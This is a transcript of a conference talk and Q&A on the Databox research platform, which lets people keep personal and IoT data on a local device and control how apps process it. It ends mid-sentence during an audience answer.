The following talk is something really really cool I think. I'm really looking forward to it and to get a glimpse of what it's all about. The talk is about a research project which let the user see and control what's done with their personal data. At least that's what I read in the description of the talk. I'm really really looking forward to hear some more details about this from Mord who is presenting this talk and he's going to be talking about the platform design, about the implementation and the current status of this data box thing. Please give a really warm round of applause to Mord. Thank you for having me. Before I start I shall begin by apologising. I have small kids so it's permanently flu season in my house. If I start coughing uncontrollably, just bear with me. What I'm going to do is talk a bit about the data box project. This is a project that was funded by the UK Research Council EPSRC. It's a collaboration between University of Cambridge, Imperial College London and University of Nottingham with a number of industrial partners, one of whom I'll mention in the talk, the BBC. To set the scene a little bit, I probably don't need to say this very much at this particular venue. You may just wish to go to those Tumblr sites which I thought were quite funny. Big DataPix, tumblr.com and we put a chip in it, tumblr.com. We're now in a big data world. Data is collected all around us in the environment from what we do, our retail habits, sensing IoT things in our homes, all around us data is being collected. There's a lot of opportunities and challenges that are presented by this. You can imagine a great deal of personalisation, personal optimisation, things you can do to make your house more energy efficient, for example. There's lots of things you can do that are beneficial from this sort of data. There's also a lot of challenges that are presented, particularly around privacy, around the rights of the individual to control and see what's happening about them. I did warn you, sorry. The nature of this sort of collection is that it's building up large collections of very rich, often quite intimate data in large silos. Some of the sensors that you can see on the top left there, you've got sort of things you might expect, retro social networks, Nest thermostats, but nowadays more intrusive things, medical devices, things that are monitoring insulin levels, heart rate, so forth. It's very rich, it's very intimate data that's now possible to be collected. The challenge that we pose ourselves in this research project was really what can we do to allow data subjects to control the collection and exploitation of data, particularly data that is what you might think of as their data, so data that's yours that you somehow own, and also data that's collected about you that you might not have such direct control over. So that's the context. How to enable data subjects to control collection and exploitation of their data and data about them. This is taking place in an existing ecosystem, which is very much focused around the idea that we want to move data around. Typically, we want to move data into the cloud. Data tends to get pushed out there. Even when it starts out, there's some data where you might expect it starts in the cloud. So you post something to Facebook, it's on Facebook's computers, that's not a surprise. On the other hand, there's a lot of sort of IoT devices that you might think could very well keep the data more local to where they're deployed. You might think that data about your house could stay in your house if that's what you wanted to happen. And yet by default, a lot of them will push that data out to the cloud, even if they subsequently give you back in some way, it will end up out there on somebody else's computer. And this seems to be, to my mind anyway, it's a structural problem about the way that we build systems nowadays. The internet has become very fragmented. It's difficult to build effective, robust, efficient distributed systems across the modern internet. And it's much easier just to centralize things. And the cloud allows us to centralize things. We can stick it all out there in some system that somebody else runs, as the sticker says, on somebody else's computer. So we're defaulting to moving data into the cloud in order to process it. It makes the processing much easier as well, if that data is centralized. The starting point for thinking about this was when I rejoined academia in about 2009 and joined a research institute at Nottingham called Horizon, Horizon Digital Economy Research. That was focused very much around this notion of digital footprint and what could we do with these digital footprints that we're creating or we're starting to create at that point. Now it was quite interdisciplinary center, so there were people there from sociology, mathematics, engineering, computer science, from all over the piece. And a lot of my colleagues essentially said, if you could build as a magic context service, we should do great things with it. We just know the context of the user, then we'll be able to do all sorts of fun and interesting interactions. And we had a number of discussions about this, where my response would often be, well, yes, but what is that? I don't know what a context, I don't really know what the context of the user is. What do you mean when you say you want to know the context of the user? And it eventually became clear that it wasn't quite well defined what that was, but it definitely involved using personal data. It was definitely going to be possible to construct this from the personal data that could now be collected from sensors, from social networks, from interactions. So the end point I came to with that was really being a lazy computer scientist to punt on the hard problems. So I wasn't going to try to define what the context was, because that seemed difficult. But what I did say was, well, if you give me some piece of code that encodes what you think the context is, then I'll try and create a platform that will execute that for you, and so return to you what you've defined the context to be. So I punted on the problem. And that gave rise to a thing that we called data-ware, which was essentially a service oriented architecture for trying to do personal data processing. So the idea was that the data processor would write some piece of code that would process the data subject's data, the subject would provide the platform on which they could execute that code, and the processor would receive the result. And the point here was that we were now moving the code to where the data was, rather than moving the data to where the code wished to execute on it. So we're not pushing the data into the cloud anymore, trying to take the code and push that to where the data starts. This was the sort of picture we had at the time of data-ware. So you've got a sort of, well, overly complex, certainly fairly complex request and permission process here. So the data processor requests permission through some mechanism, gets granted permission to do some piece of processing, and is then able to push the piece of code they want to execute onto some platform where the data is made available, and then results go back to the data processor. So that was sort of data-ware, excuse me, data-ware V1. However, when we started to try and build this and try and think about how it might be used, it became clear that there was lots of complexity in terms of the interactions you might wish to support on such a system. So there's lots of ways you can construct interaction around this. One obvious way that's received some interest is the idea that people might pay you to use your data. But there's lots of other things that you might wish to happen there. There may be many situations where you want data to be processed, but it's not appropriate for somebody to pay you. Another member of your family, it may not seem sensible for them to pay you to use your data. And there was little in the way that data-ware was constructed that actually said anything about how this was going to happen. So in the case of being paid to use data, exactly what were you being paid for? What sort of use was going to be made of your data? What was going to happen then? So data-ware was a proposal that would support some forms of interaction. It basically gave you a kind of transactional nature where you had a transaction between parties in terms of this request, grant a permission, and then possibly some ability to see what's happened afterwards. But there were a lot more things that we could consider. And so we sort of abstracted and stepped up from the problem a little bit and stepped away from data-ware and started to think more generally about what is it that's going on in this sort of system. And we coined this idea of human-data interaction with, by analogy, with human-computer interaction. So I think I'm not an either a historian or a proper HCI person. But my understanding is that HCI has essentially moved, human-computer interaction has moved as a field of study away from where it started, which was the idea of a single individual using a single computer. And it's kind of moved towards a collaboration between individuals using computers. And it's now in the sort of world where you're thinking about ubiquitous computing, where it's not necessarily obvious which the computer is you're using. And so human-data interaction tries to take that step further and say, well, in fact, it's now about the data. It's not really about the interaction with the computer anymore. It's about how you're represented in the data and what the data is used to do to you and for you. And so the very high-level model that we have here is that you have some personal data that is collected. Analytics are performed on that data. They process it in some way. And it allows you to draw some inferences to work out something about the way what that data says. And as a result of that inference process, some actions are taken. Actions might be to feedback into further analytics, feedback the inferences you've made, or actions might be nudges of things that might change your behavior and thus change the data that generates in the future. So even at this very sort of simple model, there's a couple of feedback loops that can take place. And it's in this kind of space where data processing systems and data processing computations are taking place. And we felt that the systems that we were seeing and the systems that at that point we were trying to build were lacking in kind of three key aspects which underpin this idea of human data interaction for HDI. The first was legibility. So it's clear that most people, I think, most of the time, are generally unaware of what the sources of data that might be collected about them are, for where can the data come from, generally unaware of the analyses that might be performed on those data, and generally unaware of what the implications of those analyses are. So understanding what's going to happen to you in the future on the basis of actions you've taken now or in the past that are now represented in some data set somewhere, possibly with some degree of inaccuracy, is not necessarily clear. It's not legible. It's not easy to see and understand what's happening in these systems. The second thing that seemed to be missing was agency. So agency is the capacity to act in a system. So we are often unaware, certainly I think I am unaware, speak for anybody else, of the means that I have to affect the data that's being collected about me. There are some things I think I can do to try and control what data is collected. I can block cookies in my browser. I can use Brave. I can turn on all the privacy things. But that only controls the data that's collected about me to some extent. It might be much less clear for me to know how I can affect this as I move around a smart city environment or a smart environment, for example. It's not obvious to me always what I can do to affect the analyses that are being performed on those data that have been collected about me. And in both of these cases, that's even if I know that these means to affect these things exist at all and I can be bothered to employ them because it may well be complex or difficult to employ these things effectively. So we lack agency. We lack the capacity to act. And then the third thing seemed to be what a rather ugly word, negotiability. So this is essentially trying to capture the notion of supporting the dynamics of interaction. The idea that when you make a decision, it doesn't necessarily remain your decision in this system until forevermore. You might wish to change your view on things. You might wish to change the way that you interact with the system, either as you learn more about it or as your behavior changes or as your environment changes for whatever reason. So current systems still tend to travel in this kind of binary terms of service. You click the box and say, yes, and then you're done. And you don't really get a chance to go back and revisit that. Maybe nowadays, you're starting to see more and more the idea that you can at least completely withdraw from a system. So you can be in the system or out of the system. But it's often not really possible to control what's going on in terms of your interaction with the system over time. So that gave rise to this idea of data box, which is you can think of in some ways as dataware version 2. So this is still taking the idea that you want to move the code to the data. This allows you to minimize data release, allows you to retain more control over what's done with the data, because it's running on a device that is under your control. So at the end of the day, if you really want to, you can just turn it off. But then you know that the data is not being processed anymore. We tried to pay a bit more attention to how access to data, local or remote data, was going to be mediated. We went to some effort to try and make sure that we could control all the internal and external communication and that we could log all the IO that takes place on the sort of following the idea that I don't really care what computation you do on data around me as long as you never see any result from it. And if the computation just runs on a device somewhere and then gets thrown away, has anything really happened? The computation, I don't know, runs in the wood and the tree falls on the computer. Did anything take place? So if I can log everything that goes on in terms of what's communicated from that device to the outside world, then I can in some sense, even if things go wrong, I might be able to go back after the fact and figure out what happened, figure out what leaked and why it leaked and when it leaked. So the sort of model we have with DataBox is this kind of application. This is a sort of fraud detection application. So some person called Henry downloads a bank's app onto his DataBox, later on there's a large transaction made in some foreign country against his credit card. The banking application is able to check Henry's location by saying, are you located in that country where this transaction took place? DataBox is able to say no. And then the bank can deny the transaction and so the fraud is prevented. This hasn't revealed to the bank where this individual called Henry is. There's been no release of that information. It's simply been able to say no, not where that transaction claims that he is. So this is trying to minimize the data release that takes place. So how is DataBox implemented? The model here is that we're essentially installing apps, the process data locally, so following the app metaphor from smartphones. Apps process data, we also have a notion of a driver which is something which either ingests or releases data. And there are manifests associated with each app and they describe the data that's going to be accessed by that app. And that will be turned into a concrete, what we've called an SLA, some of the terminology is a bit horrible, I apologize for that too, a concrete SLA when you install an app. So the sort of thing that might happen there is you have an app that wants to have access to your smart light bulb data. So that's in the manifest, access to smart light bulb data. When you install it, you're able to control which light bulbs it gets access to. You can have all the downstairs light bulbs, but not the upstairs light bulbs in my house. Okay, so that's the kind of the ability for the user to exercise some control over what's actually being revealed there about them and what they're happy to share in that moment for that application. All the components in DataBox we were using containerization as a lightweight sort of virtualization technique. So this gave us a degree of platform independence, a degree of isolation between running components and the ability to sort of make the management of this kind of system easier because there's quite a lot of moving parts here. And so being able to manage things in a fairly homogenous manner seemed useful. When I say platform independence there, that kind of bitles slightly for a couple of weeks because it turned out we were getting bug reports from a user where they were finding that things weren't working and it took us some time to figure out that the reason things weren't working is because they were running it on Windows using the Docker for Windows tool that had come out recently. And we didn't realize therefore that that's why the shell scripts weren't working because they were not in a Unix environment. The containers were running and they could get the containers running when they did it by hand, but all the start-up scripts did not work. There are four core components to the platform. There's a thing called a container manager, a thing called the arbiter, a thing called the core network, and then many things called data stores. The container manager is the thing that manages the containers unsurprisingly. So it manages container lifecycle in particular. It's one of the things that starts up first and then after that it controls which apps are running, which drivers are running, how things are connected and basically kicks everything off. The arbiter is the container that produces the tokens that we use for access control. The format of those tokens is a thing called a macaroon. Who's heard of macaroons? Not the biscuits, one or two. So macaroons are to reuse the pun that the authors used, macaroons are better cookies. They're essentially access control tokens that you can delegate. So you can attach constraints to them when you delegate them to other parties. The data stores provide a persistent storage facility so we can monitor everything that's being recorded and used by each application. They also provide a middleware layer. So communication happens via these data stores. That's zero MQ based middleware layer. And each store that's created gets registered in a hypercat catalog that exists on the data box. And then the idea is that that provides a degree of discoverability. So an application is able to find out what it is that this data box has and therefore whether it's going to be able to support what that application needs. And then finally, right at the center, a thing called the core network essentially tries to manage network connectivity for each application. And we sort of hack that together in the Docker world by providing a unique virtual network interface for each application, which is connected only to that application container and the data store of that application and to the core network. So we can intercept all of the communication that takes place for any application. So we can make sure that we log everything. We can make sure we prevent anything happening that we don't want to happen. As I mentioned, apps and drivers in fact come with a manifest. This basically describes origination metadata. It says what the application is going to need in terms of data access and what its storage requirements are and whether it's going to need to do any remote accesses. So it's going to need to talk to anything else on the box or anything off the box. The distinction between apps and drivers is essentially that drivers can talk to things that are not only on the data box. They can talk to things off the data box. So that's how you get data in and out of the system. This installation process, as I've hinted, you essentially start out. The user tries to install the application. They say, yes, you can have access to these data sources. And that causes particular tokens to be generated given to that application. And then that application and that application is then connected up to the right network devices. And the containers are all then started. Those tokens that the application has been given allows it then to present those tokens to the different data stores in the system. And the data stores can then verify that this application has indeed been permitted by the user to access that data. So that's the sort of mechanism for access control. I'll move fairly quickly through this in the interest of time. But this is a description of the middleware layer that we have, which is based on some standardized protocols, CoAP, running on top of 0MQ. We have a Git-like back end to this, so it records everything, and it supports JSON, text, and binary data. There's a degree of security that we attempt to provide with the intent that at some point in the future, we might like to distribute this across multiple devices. So you'll want to be able to secure the communication between data stores. And the main reason for doing this is that the first version of this we started out with was hacked together very quickly, and using a straightforward sort of HTTP REST style API with no JS. And that was not suitable in terms of supporting relatively high-frequency sensor data or the limited memory footprint that we had on things like Raspberry Pi's. This is much more effective in that sense. So what can you do with the data box? What could you do with the data box? Among the interactions that we can support, and that we think we should be able to support better, you can do things with a physical device that you can't do so easily with things that are in the cloud. Physical devices are often easier to reason about, so you can see them. So you can do things that you can simply glance at it and see what the configuration is. You can imagine situations here where, for example, we might set this up so that access to smart metering data is only going to be permitted if the green tag has been inserted into my data box and my partner's blue tag has been inserted into my data box. So we both agree that that data can be shared, or where the green tag is in the data box and we're both located in the house, so we're both proximate to it. So you can set up much richer sorts of ways to control access to data. This maps quite nicely to notions of physical access control, which most people have a pretty reasonable understanding of because we're used to doing things like locking windows and locking doors and so forth. Some of the members of the team built a thing using what's essentially a hacked up version of IBM's Node-RED. So this allowed you to assemble data box applications by dragging and dropping data sources and computational units, linking them together, and then you could essentially click the button somewhere off the bottom of the screen, and that would take what you'd produced and build that into a container and publish that to the App Store. So building applications is fairly straightforward with this sort of environment. We also did some work on looking at richer visualizations of data. So you can take an SVG image, for example, and break it up into its component parts, and then describe transformations so that as the data comes in, it animates the SVG according to what those transformations are that you've described. I think one of the earlier demos of this had an SVG with a cartoon picture of a particular American president, and then when tweets came in, that would cause parts of the face to animate according to some simple sentiment analysis of the tweets. So you can perhaps make data more legible by doing richer visualizations, making it more obvious what's more explicit, what's happening, what's represented in the data. This is a piece of work which unfortunately stalled, but with a PhD student, I was looking at what you could do in terms of generic measures of risk. So the idea that a lot of the data sources you might see in such a device are going to be time series, time series of floating point numbers essentially, temperature readings, humidity readings, air quality readings, whatever they might be. Is it possible then, the question we were exploring was, is it possible to take a time series like that and treating it simply as a time series without any semantic information about what those numbers represent? Just look at various measures of entropy, statistical measures, auto correlations and so forth to see whether or not there's in some sense risk associated with giving access to that data. So how much information is contained in that time series in a statistical sense? Is it possible to say, for this application, it's asking for access to that data at too high a frequency, it's going to be able to find out too much? Whereas this other application only wants to see an average over every three months and therefore that's fine, I don't really care what that says. And then if that could be, if you could construct things like that, the initial results was somewhat promising in this sense and perhaps you could then start to try and put those results together and say, well, this application is okay, application A is okay and application B is okay, but they come from the same publisher. So if you install both of those applications together, you may be revealing a lot to that particular data processor. Another thing which sort of pops straight out of this idea that we want to kind of atomize data and push it out to all these different data boxes is the idea that it's difficult now to do big data analytics in the traditional way you might do. You might expect where you want to put all the data into the cloud. So we were starting to think about, we have been looking a little bit at how to do small data analytics. So the idea that you might do some of the computations first when the data is still private and only subsequently try and aggregate the data. So you don't need to build up these vast data lakes of data about everything and data about every one. Instead, you try and again minimize data release, do as much of the processing as you can while the data is kept private and only later on start to aggregate results together. We had a couple of goals of this, one of which was essentially looking at pre-training models using a small sample, hopefully a statistically representative sample of user's data, and then taking those pre-trained models and pushing them out to lots of different locations. And then in those individual data boxes, you can refine those models and specialize the training of them onto those particular individuals whose data is now being used. This gets you essentially further faster in terms of the accuracy of those models. The long-term goal was to try and think about how would you actually do sort of try and do machine learning, for example, or other forms of statistical analysis of data at scale. So if you've got a data box for every house in the country, in the UK, I think it's about 30 million households, how are you going to run a computation across such a large scale set of as that? Perhaps the most complete set of applications that got built was actually built in collaboration with the BBC. So this was a collaboration that was talked about, I think there's a blog post on their website from a few months ago that describes this, but the idea of a thing they called the BBC box. The idea here was to take data from data sources that they would not wish to have direct access to themselves. So in this case, I think it was your iPlayer, viewing habits iPlayer is the BBC's content delivery system, one of them at the time, but also from your Spotify account and your Instagram account. So to try to take data from those three sources, they obviously don't want to have the data from your Spotify account, they don't want the data from your Instagram account, there's no reason they would want to hold that, it would only be a risk for them. Take the data from those systems, that goes into your data box, and then they have a BBC application running on your data box, which is able to process that, to produce a profile, which can then be sent to their content recommendation system, and so appropriate content can be recommended to you, based on quite rich data about your activities online, but without them having to have direct access to that data. Excuse me. There were a couple of other applications, we ran a hack day a couple of years ago using an earlier version of this, there were a couple of other applications I thought were pretty cool, one of which was the idea of actually exploring the idea that you could do actuation through this as well. So you could imagine having, in fact, the couple of people who were involved in producing this demonstration did actually produce this. You have a video editing suite where you assemble, let's say a horror film, from snippets of footage, you could put events in that horror film, and then playback is controlled by an application sitting on your data box, and when the appropriate points in the horror film come up, the playback application flickers the lights in your living room, where you're sitting watching the film, for example. So you can have that without, again, without the publisher of the data, without the BBC or whoever it might be that's broadcasting this film, without them needing to have direct access to control the lights in your living room, which obviously they wouldn't want to have and you probably wouldn't want them to have. So this idea of devolving the control to a device that's under your control, so it can then interact with your environment, monitor your environment, control your environment, but under your control. So that's Data Box, which I sort of mentioned, you could think of as DataWare version 2. So where's the interaction that's going on here? How is this better supporting some of these, this I in HDI, this interaction in human data interaction? It does better, perhaps, than DataWare did, but it became clear as we were going through this project that it's still not enough. So it's still the case that the request and processing tend to occur in a black box. An app is a contained environment, you can't see where it's got up to, you can't see what it's doing. It's not clear what the status of each of these applications is as they're executing the system. We have got this audit logging support in there. It's possible that using that you could come up with some kind of notion of where the processing has got to, like what the status of the application is, but what we can do at the moment just with IO is probably not rich enough. We have a number of mechanisms such as audit logging, permissions, requests that allow us to coordinate to some extent within the data box what's going on. But they don't what the HCI folks articulate to the field of work, which I'll talk about on the next slide. And then the third thing is that real world data sharing tends to be recipient designed. So I will share data, I will share information rather, with people based on the context that we're in. I might talk about something in the pub with a colleague that I wouldn't talk about with my wife, I might talk about something with my wife at home that I wouldn't talk about with a colleague in the office and so forth, right, depending on where I am controls to some extent and who I'm speaking with controls to some extent, what I'm willing to reveal to them. And the ways that we support this in data box are a little bit too slow moving. So you tend to make the decisions at the point of installation of an application. It's not necessarily straightforward to go back and change those later. It's not perhaps easy to be dynamic, sufficiently dynamic in how those permissions are being granted and how those permissions are being controlled. I mentioned articulation work. So there are some quotes from a paper by Schmidt that defines this. But the way it was explained to me as somebody who is not subtle enough to really understand some of these kind of concepts was the example given to me was walking down a busy street. So if you're walking down a busy street, you're probably walking to get somewhere. So that's the work you're doing is walking to get to your destination. But in the course of doing that, you have to do a lot of articulation work. You've got to make sure you don't bump into other people on the street. You've got to make sure you don't bump into signage on the street. You've got to make sure you don't walk into the road and get hit by a bus. And all of this kind of coordination work that you and everybody else on that busy street are carrying out, this is articulation work. It's the work that needs to be done in order that the work you want to do gets done. A subject in the data box, a data subject, is engaged in this kind of cooperative work. The subject, the data processor, there may be multiple data subjects involved. We don't really do enough in the architecture that we have to support this kind of articulation work where everybody tries to work out what's going on with everybody else so that we can all come to the right conclusion and get the right things done. The other thing about this kind of recipient design was observed by a sociology colleague that data is essentially acting as a boundary object. It's a thing that is used in a relational fashion. You use data in multiple ways and it describes a relationship you have with something else. So an example of a boundary object was a credit card receipt in the sense that this is something which is used in multiple ways simultaneously. So it's the proof of payment that the customer might have. It's the bank's proof that a valid transaction took place. It may be a supermarket's proof that the bank is supposed to pay them some money for the goods that you've taken away. All of these things are inherently relational. It's about the relationship between these parties. And it became clear when we started looking at these sorts of data that almost all personal data is in fact relational. There's very little personal data which is so private that nobody else is included in it or affected by it. This is particularly true when you look at sensing data. Most households either have multiple parties living in the house or at least they occasionally have visitors coming to the house. And so the sensing data that you might start to see being collected commonly there is going to implicate multiple people. It's not just the homeowner. It's not just one party in the house that should have control of that or that is represented in that data. Even if you take something that most people think of, who thinks of their email as private? Okay, but presumably it came from or went to somebody else in most cases. And so even there, this is data which involves other people. So in some ways what we try to do with Databox in many ways is flawed from the start because we focus on the idea of an individual having control of data. And actually data is inherently social in some sense. And so it needs to be controlled in a more social way. So moving towards sort of wrapping up the presentation part of this, there are a number of challenges that are posed, interactional challenges that are posed for HDI then which Databox doesn't fully resolve. It hopefully takes steps towards trying to surface some of them and perhaps resolve some of them but it doesn't fix them. One is a really around or a set of challenges around user driven discovery. So how do you discover as a data processor who out there has the data you might want to use? It's easy when you're collecting it and you're putting it in a cloud somewhere because you've got it. You know what you've got. But how can you find out which of the households, which of the individuals in the population has got a data box and has the data that you wish to process that would be useful to you? How do users discover what applications they might wish to install? The applications that might do things for them. How could they be empowered to make sure that they install the right applications, that they're happy with the applications that they've installed? How do we control those discovery process? There are a number of sort of more standard mechanisms I guess that can be tried out here. So along with permissions, you can imagine social rating systems, you know, 14 of your friends have installed this app and they're all very happy with it. Everybody's giving this five stars. These sorts of ways of communicating to other users that these are good applications that help them discover the right things. Legibility. There are mechanisms here that can support legibility but legibility remains a problem. You should be able to visualize your own data. You do have to now have it in your data box. It might be much more difficult to visualize the impact that other people's data has on your data or that other people's data might have on the processing of your data, what is going to be revealed as your data is processed given what has already been revealed by other people. This is true both for data that exists now but also data that might become available in the future. There's a question here, again, that comes back to discoverability as well, is what can processes discover about what you have in the same way, what can you discover about what processes want. There may also be the need to edit data. If you detect some data has been recorded, which is wrong, you want to be able to go and change it. This is another, in some sense, floor in the way that we frame this is, again, we very much want to floor. It was deliberate but it's not complete. We focus very much on the data subject, on allowing the data subject to have control over data and data processing. Of course, there are more stakeholders than just the data subject in this. The data processor might legitimately want to know that you've not tampered with the data that you're revealing to them, that you haven't faked out your propensity to risk, for example, so they give you lower insurance premiums. I understand some people when insurance companies started saying, well, if you wear a Fitbit and we can see how active you are, we'll give you reductions on your health insurance. I believe there were people who were putting their Fitbits on their dogs or on a metronome. Other mechanisms try and fake out what the data that was being recorded in order they could reduce their insurance premiums. There's clearly a need here to try and support some degree of legitimate interests of both sides, I guess, in this. As I've hinted at, data is a social thing. Most data is a social thing. You want to be able to delegate control, delegate access to data, but you also want to be able to revoke it. You want to be able to see what's been happening with your data, whether it's being edited, who's been viewing it, with whom it's being shared, and you want to be able to revoke those permissions. You also need to be able to negotiate. If you have multiple data boxes in the household, for example, it might be legitimate for my data box to have access to some of the IoT sensing data and for the other adults in the house to have access to the same IoT sensing data in my home, like the energy consumption, smart metering and so forth. Any one of us can then reveal that data to a data processor. That might not be what we wish to happen. It might be the case that it would be better if there was some way of negotiating that we all agree that we are happy for this data to be revealed to this particular data processor. We have no mechanism to support that kind of sort of social action at present. There's a need to think about who data is getting passed to. What can you do to try and work out when you revealed some data to somebody else, what they're going to do with it, and what's happening after you've made that revelation? I think from a technology perspective, the two of these that I find most interesting come down to the sharing of data and what to do about shared data. Sharing data, we want to be able to support offline data collection. We want to be able to support data collection from devices that are not necessarily co-located with the data box. This means we want some kind of rendezvous and identity service. This needs to be reliable and not infringe on the privacy of the people participating in it. Shared data is another interesting thing. There was a long-running argument for about 18 months in this project between myself and one of the collaborators around how to support this idea of shared data. What could we do given that data is inherently shared, is inherently social? Their stance was very much that what we needed to do was introduce the idea of a user account onto the data box. We would be able to manage access to the data by having user accounts on the data box so that we could say, well, you can say this and then this other account is allowed to see that data and so on. It turned out, well, it turned out, it was certainly my opinion that that was going to be inordinately complicated to implement because of what boiled down to the problem of who gets to manage these accounts, who gets to create accounts and who gets to control the accounts. With current systems, consumer systems that I'm aware of, there's no real way to have this kind of, essentially, there's no real way to do away with the idea of a root user, somebody who can see everything. It's definitely the case that in other projects that we were doing, that when you're looking at personal data, it's often the case that people are actually less concerned about complete strangers seeing their personal data than they are about other people in their house seeing personal data. The idea that your parents might be able to see what all your internet viewing habits are is something that many people find quite upsetting, but the idea that the ISP can see what you're seeing on the internet, they're not really too bothered about. So there was a difficulty there about how, if you introduce accounts, how are you going to manage the fact that there's going to be one account that's going to have access to everything and can see absolutely everything that's going on. So I fought quite hard to try and keep things so that we had one data box for one person. Unfortunately, that really doesn't solve this problem of social data. The closest we get to that is we start thinking about the idea that we could replicate data within a household across a set of data boxes, perhaps. And then you have to, well, what I did again was punt on the hard problem. So you end up in a world where you're devolving the challenge of managing access to social data to a social matter. So you say that, well, you'll discuss it with other people in the house before you start revealing this data because you know it's sensitive, because you're aware of other people's views. You're sitting in your, living in your house in your social situation and not being aware of anybody else in the house and what they think about this. So I think those are two interesting challenges from a technical perspective, how to support these kinds of interactions and these kinds of, these needs in this system. And with that, I'll finish. Any questions? So thank you very much for the talk. If you have questions, please line up at the microphone. Another thing, microphone two. Thank you. Thanks for that. I wonder how you see this moving beyond academia into sort of broad adoption. And if you have any thoughts on something like the Estonian e-citizenship model for how this could potentially scale. And then, and I guess also your thoughts on just what do you think needs to happen for this to be adopted at scale. So I'm not familiar enough with the Estonian e-citizenship model to comment on that. Frankly, I think that for this to be adopted at scale, we probably need to reinvent everything. So it's a little bit less of a research prototype. That would be a good start. I think that one of the big challenges in terms of adoption is actually around what these applications might be. There was a strong interest from other parties in this project around IoT data particularly. And one of the things it seems to me to be the case around IoT data is that we've got all these opportunities to collect lots of it, but nobody's quite sure what to do with it in terms of really compelling applications that make a great deal of sense. So in that sense, it may be that it's all dead duck. And there's no need for anything like this, because in fact, none of that's ever going to take off, because it's never going to be compelling enough to be really, really useful. So I think having some killer applications or some real use cases that are valuable here would be good. Some of the ones that I mentioned, the couple of ones I mentioned from the BBC and from other collaborators who I think were the University of York at the hackathon we ran, they started to become more interesting, I think. So you can start to see some use cases arriving there, but it's quite slow to find them and quite slow to build them. The other thing that we would definitely need for broader adoption of this sort of platform that we really need to fix as part of that rewrite is to make the development process much, much easier. It turns out that essentially there were professional developers that were hired to build that BBC demo, and they did it and they did the great job and it worked. But I think everybody involved found the development process much harder than they expected. The idea that you can't simply access a cloud service when you want to in your code, that you have to request permission for that and actually think about all that process is quite alien to modern development practices, I think. So I think the development process is something we really need to work on to actually give us a hope of being adopted. So yeah, two or three things. Thank you very much. More questions? Yeah, go ahead. Yeah, thanks a lot for the great talk. Would you say that for, so basically what you had in mind when you developed this for IoT applications? Well so it sort of changed over time. When we first started with Dataware we were thinking about social media, social networks, email, IRC logs, chat logs and so forth as personal data. We constantly wanted to do things like getting banking data out, financial data was an obvious sort of thing that people find sensitive but would like to do interesting things with. As the time passed, IoT became more of a thing. One of my collaborators in this project was essentially funded to look at IoT data specifically, so that was where the interest in that came from. I think that given the domestic context that we were targeting, IoT data is a sort of obvious thing to look at there and other sorts of household data. Finance data is another one that still be kind of obvious. Personal health data now with sort of wearables, things monitoring you can do. All of these things are sort of there. But in some sense, I'm not, I don't think it matters too much in terms of the challenges that we were coming across as we were doing this. They're fairly endemic across the space whether or not it's IoT data or other forms of data. You start to realise quite soon when you try and actually build these things that you've got these problems that data is inherently social, multiple people are implicated and so on and so forth. Great. Any more questions? Oh yeah, microphone one I think. I would like you to elaborate if you could on the different levels. There's this level of a household containing a family or someone and there's this level of a community. I think if you have something to control the temperature in the living room, you could have this box tell you that two other people not named in your household would like it to be somewhat warmer but you're paying the bill so you say this could not be the case and the whole neighbourhood street or block or something, that's a different level where you have different questions that you could elaborate and where you could have good use of this box. Yes, so that's an interesting challenge. That's part of the reason we were thinking about this kind of very widespread sort of federated data processing essentially. On the idea being that as I understand it, one of the ways that you can nudge people to reduce energy consumption for example is to tell them what the average is for people in their demographic and that's higher than what their consumption is, that acts as a prompt for them to think about bringing their consumption down. Whereas if you do it across two larger scale, everybody in the country is doing this and it becomes less meaningful. But if you know that households that are more or less the same configuration as yours are on average using a lot less energy, you might start to think about it. So that was kind of drive those sorts of applications where you want to look at data across multiple data boxes simultaneously where those data boxes may be spread across the wide area. So we started to investigate some technical means to do that. There's a system that a postdoc of mine built called OWL which is a data processing system for the OCaml programming language which was trying to embed and body some of those ideas. If you go to OCaml.xyz, that's the website for that particular thing, he was I think 18 months and he wrote 180,000 lines of OCaml code to implement that. It was fairly impressive. We haven't got to the point where we can deploy any of those yet or actually test any of them out and certainly not at that sort of scale. That's something that I'm hoping to do in the next year or two with some other developments that we've got in Cambridge around the digital built environment where I might be able to start to deploy some of these ideas and see how they work in terms of data which is being collected and managed at a scale which is larger than a single household so you don't have the same kind of domestic framing for it. Okay, do you have any more questions, microphone two? Could you elaborate a little bit further on the trust of applications and especially if they start doing unintentional things such as requesting data that well given or being based on other data reveals information without yourself intending to? So I think that's essentially one of the challenges that we haven't really addressed. So if an application that you install asks for access to data that you have not given it permission to, it can't have that. Those requests will simply be denied. But if an application that you've installed has been given access to some data and it manages to do some processing of that data and you're happy with that and the results of that processing go back to the data processor's home base and then they're able to join that with some other source of data that you had no idea about, that we can't do anything about at this point. And that's one of the challenges here is what to do when the data that you thought was okay turns out not to be okay to reveal because somebody's found something else that lets them attack it in some way. I don't know what to do about it. Thanks. So we have one more question. Yes? So when multiple apps are trying to access the same data, how do you, is there a standard that you're using like semantic web standards to understand the meaning of what certain rows or tables mean between applications? Not really, no. We didn't go down the route of trying to sort of tax-analyze everything and put everything into ontology. So at the moment the application writer just has to know that's the data source that they're accessing. So they're accessing the Philips Hue lightbulb data, they happen to know what that format is. So each application is talking to its own data store within the data box? No, the author of each application needs to know the format of the data that that application is going to process. So somebody has to go and look at some specs before they write their app. And how do you see this project like parallels between like let's say the solid project that's being led by Tim Berners-Lee or the own cloud project where again, I feel there's kind of some pattern? I think that, so based on my understanding of those projects, I think that we are focused on the platform and the control in the platform, unless about trying to control what the application tries to compute out of it. We're not, I think, solid, I think maybe has moved on since I last looked at it, but I think initially it was quite focused around the browser, for example, and we're not trying to be in relationship to the web at all. It's about having a device. I think that's the other thing that seems to be, again, when I last looked, still seem to be fairly unique. So it seemed to be something we were doing differently, which was having a physical device that users could control directly and trying to provide the affordances that you get by having a physical device rather than having something that's just abstract software in the cloud somewhere that you can't really control in the same way. Thanks. Good. Michael, for one. Hi. I'm curious if you have any data of the problem awareness in the UK? Sorry, data of the problem awareness among the population? Like if they're already aware of the implications, I guess. At the top of my head, I don't. From a previous project, we did do a review of a lot of the privacy literature. So papers have been published about people's attitudes towards privacy and understanding the problems of privacy as represented in data, but I don't actually have any sort of statistical data about how the population is generally aware of these kinds of issues. I think when we have looked a little bit at that, trying to do that sort of thing, we got, when I was at Nottingham, for example, we did some work with one of the standard surveys that I think was the city council executed every year, or frequently anyway. And if I recall correctly, there were some questions in that, the answers to which did not make sense from a technical perspective. So one of the questions that was asked was, do you use the internet? I think, and a lot of the respondents said, no, I don't use the internet. Why would I use the internet? Another question that was asked was, how do you 